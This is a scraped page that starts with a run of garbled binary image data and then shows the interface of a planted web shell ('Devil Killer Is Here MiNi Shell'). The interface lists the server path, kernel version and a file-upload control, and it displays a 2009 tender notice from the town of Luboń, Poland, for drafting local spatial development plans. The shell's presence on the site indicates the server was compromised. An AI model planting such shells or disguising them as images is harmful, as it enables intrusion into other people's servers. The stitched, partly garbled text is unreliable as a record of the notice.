JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090319/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090319/52229-N-2009.html

<p class="kh_header"><b>Luboń: OPRACOWANIE MIEJSCOWEGO PLANU ZAGOSPODAROWANIA PRZESTRZENNEGO</b><br>
<b>Numer ogłoszenia: 52229 - 2009; data zamieszczenia: 19.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miasta Luboń , pl. Edmunda Bojanowskiego 2, 62-031 Luboń, woj. wielkopolskie, tel. 061 8130011, faks 061 81-30-097.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.lubon.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> OPRACOWANIE MIEJSCOWEGO PLANU ZAGOSPODAROWANIA PRZESTRZENNEGO.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opis części zamówienia: przedmiot zamówienia został podzielony na 2 części - dopuszcza się składanie ofert częściowych obejmujących realizację minimum jednej z części zamówienia.
Część 1 -sporządzenie projektu miejscowego planu zagospodarowania przestrzennego -> Lasek - rejon ul. Nowiny <, w zakresie zgodnym z uchwałą Rady Miasta Luboń  nr XXVIII/166/2009 z dnia 5 lutego 2009r. w sprawie o przystąpieniu do sporządzenia miejscowego planu zagospodarowania przestrzennego Miasta Luboń -> Lasek - rejon ul. Nowiny< z załącznikiem graficznym, w formie:
 a)  opisowej 
 b)  graficznej w skali 1:1000, z wykorzystaniem kopii ortofotomapy wykonanej w oparciu o zdjęcia lotnicze oraz opracowania ekofizjograficznego dla Miasta Luboń oraz podkładów geodezyjnych, dostarczonych przez Zamawiającego, zweryfikowanych przez Wykonawcę pod kątem ich zgodności z aktualnym stanem faktycznym w terenie;
zgodnie z wymaganiami art.15 ust.1 i 2 ustawy z dnia 27 marca 2003r. o planowaniu i zagospodarowaniu przestrzennym (Dz. U. Nr 	80, poz. 717 z późn. zm.), w wykonaniu:
- tradycyjnym, w  tym rysunek planu zafoliowany po podpisaniu - 4 kpl  i niefoliowany - 4 kpl , do tego nim 2 egz. prognozy oddziaływania na środowisko;
- tradycyjnym - pomniejszonym tzn. rysunek planu maksymalnie w formacie A3, na potrzeby Biura Rady - 6 kpl.
- cyfrowym, w programie Auto CAD lub kompatybilnym z min, w formacie plików  .dxf  - 1 kpl  tzn. uchwała z załącznikami  i  prognozy;
oraz dwóch kompletów (kserokopii) dokumentacji formalno - prawnej, przeznaczonej do przedłożenia Wojewodzie, w ciągu 5 dni od podjęcia uchwały przyjmującej plan.
Część 2 -sporządzenie projektu miejscowego planu zagospodarowania przestrzennego - > Lasek - rejon ul. Wirowskiej <, w zakresie zgodnym z uchwałą Rady Miasta Luboń  nr XXVIII/165/2009 z dnia 5 lutego 2009r. w sprawie o przystąpieniu do sporządzenia miejscowego planu zagospodarowania przestrzennego Miasta Luboń - > Lasek - rejon ul. Wirowskiej < z załącznikiem graficznym, w formie:
 a) opisowej z zapisami, zgodnie z § 4, pkt.8 Rozporządzenia Ministra Infrastruktury z dnia 26 sierpnia 2003 r. w sprawie wymaganego zakresu projektu miejscowego plany zagospodarowania przestrzennego (Dz. U. nr 164, poz. 1587), umożliwiającym przeprowadzenie procedury scalenia i podziału, zgodnie z art. 101 - 108 ustawy z dnia 21 sierpnia 1997 r. o gospodarce nieruchomościami (t.j. Dz. U. z 2004 r., Nr 261, poz. 2603 z późn. zm.)  b) graficznej w skali 1:1000, z wykorzystaniem kopii ortofotomapy wykonanej w oparciu o zdjęcia lotnicze oraz opracowania ekofizjograficznego dla Miasta Luboń oraz podkładów geodezyjnych, dostarczonych przez Zamawiającego, zweryfikowanych przez Wykonawcę pod kątem ich zgodności z aktualnym stanem faktycznym w terenie;
zgodnie z wymaganiami art.15 ust.1 i 2 ustawy z dnia 27 marca 2003r. o planowaniu i zagospodarowaniu przestrzennym (Dz. U. Nr 	80, poz. 717 z późn. zm.), w wykonaniu:
- tradycyjnym, w tym rysunek planu zafoliowany po podpisaniu - 4 kpl  i niefoliowany - 4 kpl , do tego nim 2 egz. prognozy oddziaływania na środowisko;
- tradycyjnym - pomniejszonym tzn. rysunek planu maksymalnie w formacie A3, na potrzeby Biura Rady - 6 kpl.
- cyfrowym, w  programie Auto CAD lub kompatybilnym z min, w  formacie plików  .dxf  - 1 kpl  tzn. uchwała z załącznikami  i  prognozy;
oraz dwóch kompletów (kserokopii) dokumentacji formalno - prawnej, przeznaczonej do przedłożenia Wojewodzie, w ciągu 5 dni od podjęcia uchwały przyjmującej plan.
Szczegółowe określenie przedmiotu zamówienia oraz wielkości i zakresu zamówienia, określa pkt II.1.3 w ogłoszeniu o zamówieniu oraz Załacznik nr 1 do SIWZ..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.22.00.00-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O zamówienie mogą ubiegać się wykonawcy, którzy:
- posiadają uprawnienia do wykonania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
- posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
- posiadają doświadczenie w sporządzaniu projektów planów miejscowych, rozumiane jako wykonanie z należytą starannością w okresie ostatnich trzech lat a jeżeli okres działalności jest krótszy - w tym okresie, co najmniej dwóch planów miejscowych na obszarze i w zakresie porównywalnym z przedmiotem zamówienia,
- dysponują osobami posiadającymi uprawnienia i kwalifikacje do wykonania zamówienia tj: głównym projektantem wpisanym na listę członków właściwej Izby Urbanistów oraz co najmniej po jednej osobie posiadającej uprawnienia do projektowania w zakresie drogownictwa a w zakresie małej architektury, terenów rekreacyjnych, zieleni miejskiej, ochrony środowiska, wiedzę i przygotowanie zawodowe umożliwiające wykonanie prac projektowych;
- znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
- nie podlegają wykluczeniu z postępowania o udzielenie zamówienia /art. 24 ustawy/.
Ocena spełniania ww. warunków dokonana zostanie zgodnie z formułą > spełnia - nie spełnia <, w  oparciu o informacje zawarte w oświadczeniach i dokumentach wyszczególnionych w pkt 4 SIWZ. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż ww. warunki wykonawca spełnił..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> A) oświadczenie, że wykonawca spełnia warunki udziału w postępowaniu (jest w formularzu ofertowym);
 B) wykaz wykonanych w  okresie ostatnich trzech lat dostaw/usług, a  jeżeli okres prowadzenia działalności jest krótszy - w  tym okresie, odpowiadających swoim rodzajem i wartością dostawom/usługom stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że dostawy/usługi zostały wykonane należycie - co najmniej o rodzaju i ilości wymaganej warunkami przetargu (np. wg Załącznika nr 3 do SIWZ);
 C) aktualny odpis z właściwego rejestru lub zaświadczenie o wpisie do ewidencji działalności gospodarczej (wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert);
 D) wykaz osób, które będą wykonywać zamówienie lub będą uczestniczyć w  wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności (np. wg Załącznika 4 do SIWZ).
E) harmonogram finansowo - rzeczowy prac projektowych (np. wg Załącznika nr 5 do SIWZ),.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.lubon.pl zakładka Zamówienia publ. aktualne.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Luboń, pl. Edmunda Bojanowskiego 2, 63-030 Luboń, pok. 003.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.03.2009 godzina 08:55, miejsce: Urząd Miasta Luboń, pl. Edmunda Bojanowskiego 2, 63-030 Luboń, pok. Kancelaria w holu.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com